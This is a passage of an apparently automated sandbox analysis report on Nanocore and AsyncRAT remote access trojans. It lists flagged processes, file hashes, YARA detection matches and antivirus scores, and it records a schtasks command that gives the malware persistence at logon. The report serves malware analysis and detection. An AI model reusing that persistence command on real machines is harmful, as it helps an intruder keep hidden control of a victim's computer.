                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: NanoCore, Description: unknown, Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:high

                                            Analysis Process: ame.exe PID: 6592 Parent PID: 6428

                                            General

                                            Start time:19:09:44
                                            Start date:04/05/2021
                                            Path:C:\Users\user\AppData\Local\Temp\ame.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Users\user\AppData\Local\Temp\ame.exe'
                                            Imagebase:0x500000
                                            File size:121856 bytes
                                            MD5 hash:F7F64EC1756119F19D52FB140E22382F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ame.exe, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 62%, Virustotal, Browse
                                            • Detection: 76%, ReversingLabs
                                            Reputation:low

                                            Analysis Process: fi.exe PID: 6616 Parent PID: 6428

                                            General

                                            Start time:19:09:44
                                            Start date:04/05/2021
                                            Path:C:\Users\user\AppData\Local\Temp\fi.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\AppData\Local\Temp\fi.exe'
                                            Imagebase:0x40000
                                            File size:207360 bytes
                                            MD5 hash:86A588C5A10A04AF998DBAD9FF9A31D1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 81%, Virustotal, Browse
                                            • Detection: 91%, Metadefender, Browse
                                            • Detection: 100%, ReversingLabs
                                            Reputation:low

                                            Analysis Process: dhcpmon.exe PID: 6952 Parent PID: 3440

                                            General

                                            Start time:19:09:56
                                            Start date:04/05/2021
                                            Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                                            Imagebase:0xc40000
                                            File size:207360 bytes
                                            MD5 hash:86A588C5A10A04AF998DBAD9FF9A31D1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 81%, Virustotal, Browse
                                            • Detection: 91%, Metadefender, Browse
                                            • Detection: 100%, ReversingLabs
                                            Reputation:low

                                            Analysis Process: wscript.exe PID: 6700 Parent PID: 6592

                                            General

                                            Start time:19:11:18
                                            Start date:04/05/2021
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs'
                                            Imagebase:0x7ff6f47f0000
                                            File size:163840 bytes
                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: Notepads.exe PID: 5444 Parent PID: 6592

                                            General

                                            Start time:19:11:19
                                            Start date:04/05/2021
                                            Path:C:\Users\user\AppData\Roaming\Notepads.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Users\user\AppData\Roaming\Notepads.exe'
                                            Imagebase:0xee0000
                                            File size:121856 bytes
                                            MD5 hash:F7F64EC1756119F19D52FB140E22382F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Notepads.exe, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 76%, ReversingLabs
                                            Reputation:low

                                            Analysis Process: schtasks.exe PID: 5544 Parent PID: 6700

                                            General

                                            Start time:19:11:19
                                            Start date:04/05/2021
                                            Path:C:\Windows\System32\schtasks.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
                                            Imagebase:0x7ff6992a0000
                                            File size:226816 bytes
                                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            Analysis Process: conhost.exe PID: 5564 Parent PID: 5544

                                            General

                                            Start time:19:11:20
                                            Start date:04/05/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff61de10000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: Notepads.exe PID: 2152 Parent PID: 936

                                            General

                                            Start time:19:11:22
                                            Start date:04/05/2021
                                            Path:C:\Users\user\AppData\Roaming\Notepads.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Users\user\AppData\Roaming\Notepads.exe
                                            Imagebase:0xf40000
                                            File size:121856 bytes
                                            MD5 hash:F7F64EC1756119F19D52FB140E22382F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, Author: Joe Security
                                            Reputation:low

                                            Disassembly

                                            Code Analysis

                                            Reset < >